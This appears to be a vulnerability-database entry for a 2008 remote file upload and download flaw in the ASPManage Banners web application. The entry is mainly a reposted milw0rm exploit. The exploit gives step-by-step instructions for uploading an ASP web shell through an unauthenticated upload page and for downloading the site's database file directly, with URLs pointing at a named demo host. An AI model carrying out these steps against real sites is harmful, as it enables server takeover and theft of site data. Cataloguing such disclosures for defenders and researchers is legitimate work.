ASPManage Banners RFU/DD Multiple Remote Vuln

vendor:

ASPManage Banners

by:

ZoRLu

8.8

CVSS

HIGH

Remote File Upload/Download

434

CWE

Product Name: ASPManage Banners

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ASPManage Banners RFU/DD Multiple Remote Vuln

ASPManage Banners is prone to multiple remote vulnerabilities, including remote file upload and download. An attacker can exploit these issues to upload and download arbitrary files, allowing the attacker to execute arbitrary code on the affected computer. This can facilitate unauthorized access and privilege escalation.

Mitigation:

Users should apply the latest available patches to help mitigate the risk of exploitation.

Source

Exploit-DB raw data:

[~] ASPManage Banners RFU/DD Multiple Remote Vuln
[~]
[~] Demo: http://demo.merlix.com/adbanner5
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp: ( rfu )

http://localhost/script/banners/shell.asp

exp: ( dd )

http://localhost/script/data/DataBase.mdb



rfu: ( for demo )

you go here:

http://demo.merlix.com/adbanner5/Upload.Asp

select your shell.asp

after click to upload button

go your shell.asp

http://demo.merlix.com/adbanner5/banners/xyz.asp


dd: ( for demo )

http://demo.merlix.com/adbanner5/data/DataBase.mdb


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-07]